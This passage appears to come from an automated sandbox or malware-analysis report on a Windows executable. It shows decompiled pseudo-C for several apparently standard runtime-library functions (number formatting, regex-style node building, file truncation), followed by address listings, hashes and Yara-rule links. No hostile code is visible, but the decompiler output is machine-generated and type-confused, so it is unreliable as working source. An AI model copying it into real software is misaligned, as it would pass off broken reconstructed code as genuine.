														__eflags = _t181 - _t172;
														if(_t181 != _t172) {
															L64:
															_push(_t136);
															_push(_t107);
															_push(0xa);
															_push(_t186);
															_push(_t148);
															_t110 = E004357C0();
															_v40 = _t172;
															 *_t181 = _t110 + 0x30;
															_t181 = _t181 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t149 = _t148 + 0x30;
															__eflags = _t149;
															 *_t181 = _t149;
															 *(_t181 + 1) = _t107;
															_t182 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t182;
														}
														__eflags = _t186 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t148 - 0xa;
														if(_t148 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t186 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t148 - 0x64;
													if(_t148 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t136 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t136);
													_push(_t107);
													_push(_t136);
													_push(_t186);
													_t113 = E004357C0();
													_t186 = _t136;
													_t136 = _t148;
													_v32 = _t172;
													_t172 = _v40;
													 *_t172 = _t113 + 0x30;
													_t181 = _t172 + 1;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t148 - 0x3e8;
												if(_t148 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t148;
											if(_t148 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t184 = _t91;
							_t143 =  *_t135 | _t135[1] & 0x000fffff;
							__eflags = _t143;
							if(_t143 != 0) {
								_v20 = 0x3fe;
								goto L19;
							}
							_v20 = _t143;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
							_t141 = _t135[1];
							goto L14;
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t182 = E0042888A(_t135, _t141, _t195, _t135, _t184, _a12, _a16, _a20, _t180, 0, _a32, 0);
					__eflags = _t182;
					if(_t182 == 0) {
						_t131 = E00435960(_t184, 0x65);
						__eflags = _t131;
						if(_t131 != 0) {
							_t166 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t166;
							 *_t131 = _t166;
							 *((char*)(_t131 + 3)) = 0;
						}
						_t182 = 0;
					} else {
						 *_t184 = 0;
					}
					goto L66;
				}
				_t132 = E0041A8EF(_t192);
				_t182 = 0x22;
				 *_t132 = _t182;
				E0041A815();
				goto L66;
			}

0x0042856f
0x0042856f
0x0042857a
0x0042857f
0x00428581
0x00428581
0x00428585
0x0042858e
0x00428590
0x00428595
0x00428598
0x0042859b
0x004285b1
0x004285b4
0x004285b9
0x004285c3
0x004285c8
0x0042861c
0x0042861e
0x0042862d
0x00428630
0x00428630
0x00428633
0x00428635
0x0042863c
0x0042864e
0x00428651
0x00428656
0x0042865a
0x0042865b
0x0042867b
0x0042867e
0x0042867e
0x0042867e
0x00428680
0x00428680
0x00428680
0x00428683
0x00428686
0x00428688
0x00428699
0x0042868a
0x0042868a
0x0042868a
0x0042869b
0x004286a0
0x004286a0
0x004286a5
0x004286a8
0x004286b2
0x004286b4
0x004286b6
0x004286bb
0x004286bc
0x004286bf
0x004286c2
0x004286c5
0x004286c5
0x004286c7
0x00000000
0x00000000
0x004286de
0x004286e5
0x004286e9
0x004286ec
0x004286ef
0x004286f1
0x004286f1
0x004286f1
0x004286f7
0x004286fa
0x004286fe
0x00428700
0x00428704
0x00428707
0x0042870a
0x0042870b
0x0042870e
0x00428711
0x00428714
0x00428714
0x00428719
0x0042871c
0x0042871f
0x00000000
0x00000000
0x00428736
0x0042873b
0x0042873f
0x00000000
0x00000000
0x00428743
0x00428743
0x00428746
0x00428747
0x00428747
0x00428749
0x0042874c
0x00000000
0x00000000
0x0042874e
0x00428751
0x00428758
0x0042875b
0x0042875e
0x00428773
0x00428773
0x00428773
0x00428760
0x00428760
0x00428763
0x0042876d
0x0042876d
0x00428765
0x00428768
0x00428768
0x0042876f
0x0042876f
0x00000000
0x0042875e
0x00428753
0x00428753
0x00428755
0x00428755
0x004286aa
0x004286aa
0x004286ac
0x00428776
0x00428776
0x00428778
0x0042877a
0x0042877d
0x0042877e
0x0042877f
0x00428780
0x00428788
0x00428788
0x0042878a
0x0042878a
0x0042878d
0x00428790
0x00428793
0x00428795
0x00428797
0x00428797
0x004287a4
0x004287ab
0x004287b2
0x004287b4
0x004287bd
0x004287bd
0x004287c0
0x004287c2
0x004287c2
0x004287c5
0x004287c8
0x004287d4
0x004287d4
0x004287d8
0x004287db
0x004287dd
0x00000000
0x004287ca
0x004287ca
0x004287d0
0x004287d0
0x004287de
0x004287de
0x004287e1
0x004287e5
0x004287e6
0x004287e8
0x004287ea
0x004287ec
0x00428816
0x00428816
0x00428818
0x00428825
0x00428825
0x00428826
0x00428827
0x00428829
0x0042882b
0x00428830
0x00428832
0x00428836
0x00428839
0x0042883c
0x0042883e
0x0042883f
0x0042883f
0x00428841
0x00428841
0x00428843
0x00428850
0x00428850
0x00428851
0x00428852
0x00428854
0x00428855
0x00428856
0x0042885f
0x00428862
0x00428864
0x00428865
0x00428865
0x00428867
0x00428867
0x00428867
0x0042886a
0x0042886c
0x0042886f
0x00428871
0x00428877
0x0042887c
0x0042887c
0x00428889
0x00428889
0x00428845
0x00428847
0x00000000
0x00000000
0x00428849
0x00000000
0x00000000
0x0042884b
0x0042884e
0x00000000
0x00000000
0x00000000
0x0042884e
0x0042881a
0x0042881c
0x00000000
0x00000000
0x0042881e
0x00000000
0x00000000
0x00428820
0x00428823
0x00000000
0x00000000
0x00000000
0x00428823
0x004287ee
0x004287f3
0x004287f9
0x004287f9
0x004287fa
0x004287fb
0x004287fc
0x004287fe
0x00428803
0x00428805
0x00428807
0x0042880c
0x0042880f
0x00428811
0x00428814
0x00428814
0x00000000
0x00428814
0x004287f5
0x004287f7
0x00000000
0x00000000
0x00000000
0x004287f7
0x004287cc
0x004287ce
0x00000000
0x00000000
0x00000000
0x004287ce
0x004287c8
0x00000000
0x004286ac
0x004286a8
0x0042865d
0x00428669
0x00428669
0x0042866b
0x00428672
0x00000000
0x00428672
0x0042866d
0x00000000
0x0042866d
0x00428620
0x00428626
0x00428626
0x00428629
0x00428629
0x0042862a
0x00000000
0x0042862a
0x00428622
0x00428624
0x00000000
0x00000000
0x00000000
0x00428624
0x004285e2
0x004285e7
0x004285e9
0x004285f6
0x004285fd
0x004285ff
0x0042860a
0x0042860a
0x0042860d
0x0042860f
0x0042860f
0x00428613
0x004285eb
0x004285eb
0x004285eb
0x00000000
0x004285e9
0x0042859d
0x004285a4
0x004285a5
0x004285a7
0x00000000

APIs

_strrchr.LIBCMT ref: 004285F6
__alldvrm.LIBCMT ref: 004287FE
__alldvrm.LIBCMT ref: 0042882B
__alldvrm.LIBCMT ref: 00428856

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 4e154c6342e0a311b7b359a26d00aea71fb37bc87d0f4856a8aca0f58f98a24b
Instruction ID: c6ad90838debddb3c1d5e701fb750034b57d2399c481a9674ff2ea9fc5dbdef9
Opcode Fuzzy Hash: 4e154c6342e0a311b7b359a26d00aea71fb37bc87d0f4856a8aca0f58f98a24b
Instruction Fuzzy Hash: A3B12731A022659FDB119F28D8817AEBBE5EF55340FA481AFD4459B342DA3C8D01CB99

Uniqueness

Uniqueness Score: 0.10%

Function 0042856F, Relevance: 6.3, APIs: 4, Instructions: 321COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004285F6
__alldvrm.LIBCMT ref: 004287FE
__alldvrm.LIBCMT ref: 0042882B
__alldvrm.LIBCMT ref: 00428856

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c99135edf448020444ca99b28455357e5c2fb0c18ec4d9815da596fcb8f5ddbc
Instruction ID: c6ad90838debddb3c1d5e701fb750034b57d2399c481a9674ff2ea9fc5dbdef9
Opcode Fuzzy Hash: c99135edf448020444ca99b28455357e5c2fb0c18ec4d9815da596fcb8f5ddbc
Instruction Fuzzy Hash: A3B12731A022659FDB119F28D8817AEBBE5EF55340FA481AFD4459B342DA3C8D01CB99

Uniqueness

Uniqueness Score: 0.10%

Function 004061A0, Relevance: 6.1, APIs: 4, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004061A0(void* __ecx, signed int _a4, signed char _a8) {
				signed char* _v0;
				signed char _v4;
				intOrPtr _v8;
				signed char _v12;
				signed char _v20;
				void* __edi;
				signed int _t163;
				intOrPtr _t165;
				signed char _t167;
				signed char _t169;
				intOrPtr _t170;
				signed char _t172;
				signed char _t175;
				signed char _t178;
				signed char _t188;
				signed char _t190;
				signed char _t193;
				signed char _t197;
				signed char _t203;
				signed char _t205;
				void* _t206;
				signed char _t208;
				unsigned int _t212;
				unsigned int _t217;
				signed char _t219;
				signed char _t221;
				signed int _t226;
				signed char _t228;
				signed char _t231;
				signed char* _t243;
				signed char _t245;
				void* _t249;
				signed char _t251;
				signed int _t252;
				signed char _t253;
				signed char _t255;
				signed char _t260;
				intOrPtr _t263;
				signed char _t264;
				signed char _t265;
				void* _t269;
				signed int _t271;
				void* _t274;

				_t217 = _a4 & 0x000000ff;
				_t249 = __ecx;
				_t226 = _a8 & 0x000000ff;
				_a4 = _t226;
				if(( *(__ecx + 8) & 0x00000100) != 0) {
					_push(_t217);
					_t212 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0xc)) + 4)))) + 0x10))))();
					_t241 = _v0;
					_t217 = _t212;
					_push(_v0);
					_t163 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0xc)) + 4)))) + 0x10))))();
					_t226 = _t163;
					_v4 = _t226;
				}
				_t260 =  *(_t249 + 4);
				if(_t217 > _t226) {
					L28:
					return _t163;
				} else {
					while(_t226 <  *((intOrPtr*)(_t249 + 0x10))) {
						_t286 =  *((intOrPtr*)(_t260 + 0x18));
						if( *((intOrPtr*)(_t260 + 0x18)) == 0) {
							_t208 = E0041500C(_t241, _t286, 0x20);
							_t274 = _t274 + 4;
							if(_t208 == 0) {
								_t208 = 0;
								__eflags = 0;
							} else {
								asm("xorps xmm0, xmm0");
								asm("movups [eax], xmm0");
								asm("movups [eax+0x10], xmm0");
							}
							 *((intOrPtr*)(_t260 + 0x18)) = _t208;
						}
						_t163 = _t217 & 0x00000007;
						_t241 = (_t217 >> 3) +  *((intOrPtr*)(_t260 + 0x18));
						_t217 = _t217 + 1;
						asm("bts ecx, eax");
						 *_t241 =  *_t241 & 0x000000ff;
						_t226 = _a4;
						if(_t217 <= _t226) {
							continue;
						} else {
							return _t163;
						}
						goto L68;
					}
					__eflags = _t226 - _t217;
					if(_t226 < _t217) {
						goto L28;
					} else {
						_t163 = _t226 - _t217;
						__eflags = _t163 -  *((intOrPtr*)(_t249 + 0x14));
						if(_t163 >=  *((intOrPtr*)(_t249 + 0x14))) {
							__eflags =  *(_t260 + 0x20);
							if(__eflags == 0) {
								_t205 = E0041500C(_t241, __eflags, 0xc);
								_t274 = _t274 + 4;
								__eflags = _t205;
								if(_t205 == 0) {
									_t205 = 0;
									__eflags = 0;
								} else {
									 *_t205 = 0;
									 *(_t205 + 4) = 0;
									 *(_t205 + 8) = 0;
								}
								 *(_t260 + 0x20) = _t205;
							}
							_t251 =  *(_t260 + 0x20);
							_push(_t269);
							_t165 =  *((intOrPtr*)(_t251 + 4));
							__eflags =  *_t251 - _t165;
							if( *_t251 > _t165) {
								L24:
								_t226 =  *(_t251 + 8);
								 *(_t226 +  *((intOrPtr*)(_t251 + 4))) = _t217;
								 *((intOrPtr*)(_t251 + 4)) =  *((intOrPtr*)(_t251 + 4)) + 1;
								_t260 =  *(_t260 + 0x20);
								_t252 =  *(_t260 + 4);
								__eflags =  *_t260 - _t252;
								if( *_t260 > _t252) {
									L27:
									_t163 =  *(_t260 + 4);
									 *((char*)( *(_t260 + 8) + _t163)) = _a4;
									_t45 = _t260 + 4;
									 *_t45 =  *(_t260 + 4) + 1;
									__eflags =  *_t45;
									goto L28;
								} else {
									_t251 = _t252 + 0x10;
									_push(_t251);
									_push( *(_t260 + 8));
									_t167 = E0041A97E();
									__eflags = _t167;
									if(__eflags == 0) {
										goto L30;
									} else {
										 *(_t260 + 8) = _t167;
										 *_t260 = _t251;
										goto L27;
									}
								}
							} else {
								_t29 = _t165 + 0x10; // 0x10
								_t269 = _t29;
								_push(_t269);
								_push( *(_t251 + 8));
								_t203 = E0041A97E();
								__eflags = _t203;
								if(__eflags == 0) {
									E00415C7B(_t241, __eflags);
									L30:
									E00415C7B(_t241, __eflags);
									asm("int3");
									asm("int3");
									_push(_t226);
									_push(_t217);
									_push(_t269);
									_t271 = _t226;
									_push(_t260);
									_push(_t251);
									_t169 = _a4;
									__eflags =  *((intOrPtr*)(_t169 + 4)) - 6;
									if( *((intOrPtr*)(_t169 + 4)) == 6) {
										__eflags =  *(_t169 + 0x18) - 1;
										if( *(_t169 + 0x18) != 1) {
											_t50 = _t169 + 0x18;
											 *_t50 =  *(_t169 + 0x18) - 1;
											__eflags =  *_t50;
											E00405CE0(_t271, _t241, _t251,  *( *((intOrPtr*)(_t169 + 0x1c)) +  *(_t169 + 0x18)) & 0x000000ff);
										}
									}
									_t219 = _a4;
									_v20 = _t219;
									_t170 =  *((intOrPtr*)(_t219 + 4));
									__eflags = _t170 - 9;
									if(_t170 == 9) {
										L36:
										_t219 =  *(_t219 + 0x14);
										_v20 = _t219;
									} else {
										__eflags = _t170 - 0xe;
										if(_t170 == 0xe) {
											goto L36;
										}
									}
									__eflags = _v12;
									if(__eflags != 0) {
										L58:
										_t253 = E0041500C(_t241, __eflags, 0x18);
										__eflags = _t253;
										if(__eflags == 0) {
											_t253 = 0;
											__eflags = 0;
										} else {
											 *((intOrPtr*)(_t253 + 4)) = 0x13;
											 *(_t253 + 8) = 0;
											 *(_t253 + 0xc) = 0;
											 *(_t253 + 0x10) = 0;
											 *_t253 = 0x4375c0;
											 *(_t253 + 0x14) = 0;
										}
										_t172 = E0041500C(_t241, __eflags, 0x28); // executed
										_v20 = _t172;
										__eflags = _t172;
										if(_t172 == 0) {
											_t228 = 0;
											__eflags = 0;
										} else {
											_t243 = _v0;
											_t263 =  *((intOrPtr*)(_t243 + 0x18));
											 *((intOrPtr*)(_t243 + 0x18)) = _t263 + 1;
											_t228 = _t172;
											__eflags = _v4;
											_t182 =  !=  ? 2 : 0;
											 *((intOrPtr*)(_t228 + 4)) = 0x12;
											 *((intOrPtr*)(_t228 + 8)) =  !=  ? 2 : 0;
											 *(_t228 + 0x14) = _v12;
											 *(_t228 + 0xc) = 0;
											 *(_t228 + 0x10) = 0;
											 *_t228 = 0x4375c8;
											 *((intOrPtr*)(_t228 + 0x18)) = _v8;
											 *(_t228 + 0x1c) = _t253;
											 *((intOrPtr*)(_t228 + 0x20)) = _t263;
											 *((intOrPtr*)(_t228 + 0x24)) = 0xffffffff;
										}
										 *(_t253 + 0x14) = _t228;
										 *(_t253 + 0x10) = _a4;
										_t175 =  *(_a4 + 0xc);
										__eflags = _t175;
										if(_t175 != 0) {
											 *(_t253 + 0xc) = _t175;
											 *( *(_a4 + 0xc) + 0x10) = _t253;
										}
										 *(_a4 + 0xc) = _t253;
										_a4 = _t253;
										 *( *(_t219 + 0x10) + 0xc) = _t228;
										_t178 =  *(_t219 + 0x10);
										 *(_t228 + 0x10) = _t178;
										 *(_t219 + 0x10) = _t228;
										 *(_t228 + 0xc) = _t219;
										goto L67;
									} else {
										__eflags = _v8 - 1;
										if(__eflags != 0) {
											goto L58;
										} else {
											_t264 = E0041500C(_t241, __eflags, 0x14);
											__eflags = _t264;
											if(__eflags == 0) {
												_t264 = 0;
												__eflags = 0;
											} else {
												 *((intOrPtr*)(_t264 + 4)) = 0x11;
												 *(_t264 + 8) = 0;
												 *(_t264 + 0xc) = 0;
												 *(_t264 + 0x10) = 0;
												 *_t264 = 0x4375a4;
											}
											_t255 = E0041500C(_t241, __eflags, 0x1c);
											__eflags = _t255;
											if(__eflags == 0) {
												_t255 = 0;
												__eflags = 0;
											} else {
												 *((intOrPtr*)(_t255 + 4)) = 0x10;
												 *(_t255 + 8) = 0;
												 *(_t255 + 0xc) = 0;
												 *(_t255 + 0x10) = 0;
												 *_t255 = 0x4375ac;
												 *(_t255 + 0x14) = _t264;
												 *(_t255 + 0x18) = 0;
											}
											_t221 = E0041500C(_t241, __eflags, 0x1c);
											__eflags = _t221;
											if(__eflags == 0) {
												_t221 = 0;
												__eflags = 0;
											} else {
												 *((intOrPtr*)(_t221 + 4)) = 0x10;
												 *(_t221 + 8) = 0;
												 *(_t221 + 0xc) = 0;
												 *(_t221 + 0x10) = 0;
												 *_t221 = 0x4375ac;
												 *(_t221 + 0x14) = _t264;
												 *(_t221 + 0x18) = 0;
											}
											_t188 = E0041500C(_t241, __eflags, 0x14);
											_v12 = _t188;
											__eflags = _t188;
											if(__eflags == 0) {
												_v12 = 0;
											} else {
												 *_t188 = 0x437520;
												 *((intOrPtr*)(_t188 + 4)) = 8;
												 *(_t188 + 8) = 0;
												 *(_t188 + 0xc) = 0;
												 *(_t188 + 0x10) = 0;
											}
											_t231 = E0041500C(_t241, __eflags, 0x18);
											_t190 = _v12;
											__eflags = _t231;
											if(_t231 == 0) {
												_t231 = 0;
												__eflags = 0;
											} else {
												 *((intOrPtr*)(_t231 + 4)) = 9;
												 *(_t231 + 8) = 0;
												 *(_t231 + 0xc) = 0;
												 *(_t231 + 0x10) = 0;
												 *_t231 = 0x437554;
												 *(_t231 + 0x14) = _t190;
											}
											 *(_t221 + 0xc) = _t190;
											 *(_t190 + 0x10) = _t221;
											 *(_t190 + 0xc) = _t231;
											 *(_t231 + 0x10) = _t190;
											 *(_t231 + 0xc) = _t264;
											 *(_t255 + 0x18) = _t221;
											 *(_t264 + 0x10) = _a4;
											_t193 =  *(_a4 + 0xc);
											__eflags = _t193;
											if(_t193 != 0) {
												 *(_t264 + 0xc) = _t193;
												 *( *(_a4 + 0xc) + 0x10) = _t264;
											}
											__eflags = _v4;
											 *(_a4 + 0xc) = _t264;
											_a4 = _t264;
											_t265 = _v20;
											 *( *(_t265 + 0x10) + 0xc) = _t255;
											_t178 =  *(_t265 + 0x10);
											 *(_t255 + 0x10) = _t178;
											 *(_t265 + 0x10) = _t255;
											 *(_t255 + 0xc) = _t265;
											if(_v4 != 0) {
												L67:
												return _t178;
											} else {
												_t245 =  *(_t221 + 0xc);
												 *(_t265 + 0x10) =  *(_t245 + 0x10);
												 *(_t245 + 0x10) =  *(_t265 + 0x10);
												_t197 =  *(_t221 + 0xc);
												 *(_t255 + 0xc) = _t197;
												 *(_t221 + 0xc) =  *(_t255 + 0xc);
												return _t197;
											}
										}
									}
								} else {
									 *(_t251 + 8) = _t203;
									 *_t251 = _t269;
									goto L24;
								}
							}
						} else {
							__eflags = _t217 - _t226;
							if(_t217 > _t226) {
								goto L28;
							} else {
								do {
									_t206 = E00405D70(_t249, _t241, _t249, _t217);
									_t217 = _t217 + 1;
									__eflags = _t217 - _v0;
								} while (_t217 <= _v0);
								return _t206;
							}
						}
					}
				}
				L68:
			}

0x004061a1
0x004061a8
0x004061aa
0x004061af
0x004061ba
0x004061bf
0x004061c8
0x004061ca
0x004061ce
0x004061d4
0x004061dd
0x004061df
0x004061e2
0x004061e2
0x004061e6
0x004061eb
0x004062fe
0x00406301
0x004061f1
0x004061f1
0x004061f6
0x004061fa
0x004061fe
0x00406203
0x00406208
0x00406216
0x00406216
0x0040620a
0x0040620a
0x0040620d
0x00406210
0x00406210
0x00406218
0x00406218
0x00406222
0x00406225
0x00406228
0x0040622c
0x0040622f
0x00406231
0x00406237
0x00000000
0x00406239
0x0040623c
0x0040623c
0x00000000
0x00406237
0x0040623f
0x00406241
0x00000000
0x00406247
0x00406249
0x0040624b
0x0040624e
0x0040626d
0x00406271
0x00406275
0x0040627a
0x0040627d
0x0040627f
0x00406297
0x00406297
0x00406281
0x00406281
0x00406287
0x0040628e
0x0040628e
0x00406299
0x00406299
0x0040629c
0x0040629f
0x004062a0
0x004062a3
0x004062a5
0x004062bf
0x004062c2
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062d1
0x004062d3
0x004062ed
0x004062ed
0x004062f8
0x004062fb
0x004062fb
0x004062fb
0x00000000
0x004062d5
0x004062d5
0x004062d8
0x004062d9
0x004062dc
0x004062e4
0x004062e6
0x00000000
0x004062e8
0x004062e8
0x004062eb
0x00000000
0x004062eb
0x004062e6
0x004062a7
0x004062a7
0x004062a7
0x004062aa
0x004062ab
0x004062ae
0x004062b6
0x004062b8
0x00406304
0x00406309
0x00406309
0x0040630e
0x0040630f
0x00406310
0x00406311
0x00406312
0x00406313
0x00406315
0x00406316
0x00406317
0x0040631a
0x0040631e
0x00406320
0x00406324
0x00406326
0x00406326
0x00406326
0x00406336
0x00406336
0x00406324
0x0040633b
0x0040633e
0x00406342
0x00406345
0x00406348
0x0040634f
0x0040634f
0x00406352
0x0040634a
0x0040634a
0x0040634d
0x00000000
0x00000000
0x0040634d
0x00406356
0x0040635b
0x00406518
0x0040651f
0x00406524
0x00406526
0x00406553
0x00406553
0x00406528
0x00406528
0x0040652f
0x00406536
0x0040653d
0x00406544
0x0040654a
0x0040654a
0x00406557
0x0040655f
0x00406563
0x00406565
0x004065be
0x004065be
0x00406567
0x00406567
0x0040656a
0x00406570
0x00406573
0x0040657c
0x00406580
0x00406583
0x0040658a
0x00406591
0x00406598
0x0040659f
0x004065a6
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065c0
0x004065c6
0x004065cc
0x004065cf
0x004065d1
0x004065d3
0x004065dc
0x004065dc
0x004065e2
0x004065e5
0x004065eb
0x004065ee
0x004065f1
0x004065f4
0x004065f7
0x00000000
0x00406361
0x00406361
0x00406366
0x00000000
0x0040636c
0x00406373
0x00406378
0x0040637a
0x004063a0
0x004063a0
0x0040637c
0x0040637c
0x00406383
0x0040638a
0x00406391
0x00406398
0x00406398
0x004063a9
0x004063ae
0x004063b0
0x004063e0
0x004063e0
0x004063b2
0x004063b2
0x004063b9
0x004063c0
0x004063c7
0x004063ce
0x004063d4
0x004063d7
0x004063d7
0x004063e9
0x004063ee
0x004063f0
0x00406420
0x00406420
0x004063f2
0x004063f2
0x004063f9
0x00406400
0x00406407
0x0040640e
0x00406414
0x00406417
0x00406417
0x00406424
0x0040642c
0x00406430
0x00406432
0x00406458
0x00406434
0x00406434
0x0040643a
0x00406441
0x00406448
0x0040644f
0x0040644f
0x00406467
0x0040646c
0x00406470
0x00406472
0x0040649b
0x0040649b
0x00406474
0x00406474
0x0040647b
0x00406482
0x00406489
0x00406490
0x00406496
0x00406496
0x0040649d
0x004064a0
0x004064a3
0x004064a6
0x004064a9
0x004064ac
0x004064b2
0x004064b8
0x004064bb
0x004064bd
0x004064bf
0x004064c8
0x004064c8
0x004064cb
0x004064d3
0x004064d6
0x004064d9
0x004064e0
0x004064e3
0x004064e6
0x004064e9
0x004064ec
0x004064ef
0x004065fa
0x004065ff
0x004064f5
0x004064f5
0x004064fe
0x00406501
0x00406507
0x0040650a
0x00406510
0x00406515
0x00406515
0x004064ef
0x00406366
0x004062ba
0x004062ba
0x004062bd
0x00000000
0x004062bd
0x004062b8
0x00406250
0x00406250
0x00406252
0x00000000
0x00406258
0x00406258
0x0040625b
0x00406260
0x00406261
0x00406261
0x0040626a
0x0040626a
0x00406252
0x0040624e
0x00406241
0x00000000

APIs

new.LIBCMT ref: 004061FE
new.LIBCMT ref: 00406275

Part of subcall function 0041500C: Concurrency::cancel_current_task.LIBCPMT ref: 0041502B

Part of subcall function 00405D70: new.LIBCMT ref: 00405DA2
Part of subcall function 00405D70: Concurrency::cancel_current_task.LIBCPMT ref: 00405DFD

Concurrency::cancel_current_task.LIBCPMT ref: 00406304

Part of subcall function 00415C7B: __CxxThrowException@8.LIBVCRUNTIME ref: 00415C92

Concurrency::cancel_current_task.LIBCPMT ref: 00406309

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Concurrency::cancel_current_task$Exception@8Throw
String ID:
API String ID: 3339364867-0
Opcode ID: e264102c68318a3190c1c602d43fdb8debc445ab43b261a1c867eee36aad7d2d
Instruction ID: 8e82737922d06fd2dfbe6033713c0ede49d6fd17c81414ec59fb3b485e47d4de
Opcode Fuzzy Hash: e264102c68318a3190c1c602d43fdb8debc445ab43b261a1c867eee36aad7d2d
Instruction Fuzzy Hash: 6541B271600702DFC314DF59C480A16F7E0BF95301F168A7EE49A97692D734F8A4CB95

Uniqueness

Uniqueness Score: 2.84%

Function 0043525E, Relevance: 6.1, APIs: 4, Instructions: 133
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0043525E(signed int __edx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				int _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				int _t30;
				signed int _t31;
				intOrPtr* _t36;
				int _t40;
				int _t41;
				void* _t42;
				void* _t54;
				void* _t56;
				signed int _t58;
				intOrPtr _t59;
				int _t60;
				void* _t62;
				void* _t63;
				int _t68;
				void* _t71;

				_t71 = __fp0;
				_t58 = __edx;
				_t50 = _a4;
				E00435211( &_v44, __edx, _a4, _a8, _a12);
				if((_v44 & _v40) == 0xffffffff || (_v36 & _v32) == 0xffffffff) {
					L28:
					_t59 =  *((intOrPtr*)(E0041A8EF(__eflags)));
					goto L29;
				} else {
					_t30 = _v24;
					_t60 = _v28;
					_v8 = _t30;
					_t68 = _t30;
					if(_t68 < 0) {
						L25:
						_t31 = E004280D4(_t50, _a8, _a12, 0);
						_t63 = _t63 + 0x10;
						__eflags = (_t31 & _t58) - 0xffffffff;
						if(__eflags == 0) {
							goto L28;
						}
						__eflags = SetEndOfFile(E0042DABB(_t50));
						if(__eflags != 0) {
							L18:
							_t59 = 0;
							L29:
							E004280D4(_v20, _v44, _v40, 0);
							return _t59;
						}
						 *((intOrPtr*)(E0041A8EF(__eflags))) = 0xd;
						_t36 = E0041A8DC(__eflags);
						 *_t36 = GetLastError();
						goto L28;
					}
					if(_t68 > 0 || _t60 != 0) {
						_t62 = E00420EFE(0x1000, 1);
						_pop(_t54);
						_t70 = _t62;
						if(_t62 != 0) {
							_v12 = E00423A39(_t54, _t50, 0x8000);
							_t40 = _v24;
							_pop(_t56);
							do {
								__eflags = _t40;
								if(__eflags < 0) {
									L12:
									_t41 = _t60;
									L13:
									_t42 = E0042716C(_t71, _t50, _t62, _t41);
									_t63 = _t63 + 0xc;
									__eflags = _t42 - 0xffffffff;
									if(__eflags == 0) {
										__eflags =  *((intOrPtr*)(E0041A8DC(__eflags))) - 5;
										if(__eflags == 0) {
											 *((intOrPtr*)(E0041A8EF(__eflags))) = 0xd;
										}
										L21:
										_t59 =  *((intOrPtr*)(E0041A8EF(_t70)));
										E004214E2(_t62);
										goto L29;
									}
									asm("cdq");
									_t60 = _t60 - _t42;
									_t40 = _v8;
									asm("sbb eax, edx");
									_v8 = _t40;
									__eflags = _t40;
									if(__eflags > 0) {
										L11:
										_t41 = 0x1000;
										goto L13;
									}
									if(__eflags < 0) {
										break;
									}
									goto L16;
								}
								if(__eflags > 0) {
									goto L11;
								}
								__eflags = _t60 - 0x1000;
								if(_t60 < 0x1000) {
									goto L12;
								}
								goto L11;
								L16:
								__eflags = _t60;
							} while (_t60 != 0);
							E00423A39(_t56, _t50, _v12);
							E004214E2(_t62);
							_t63 = _t63 + 0xc;
							goto L18;
						}
						 *((intOrPtr*)(E0041A8EF(_t70))) = 0xc;
						goto L21;
					} else {
						__eflags = _t30;
						if(__eflags > 0) {
							goto L18;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t60;
						if(_t60 >= 0) {
							goto L18;
						}
						goto L25;
					}
				}
			}

0x0043525e
0x0043525e
0x00435267
0x00435276
0x00435284
0x004353ad
0x004353b2
0x00000000
0x00435299
0x00435299
0x0043529c
0x0043529f
0x004352a2
0x004352a4
0x00435369
0x00435372
0x00435379
0x0043537c
0x0043537f
0x00000000
0x00000000
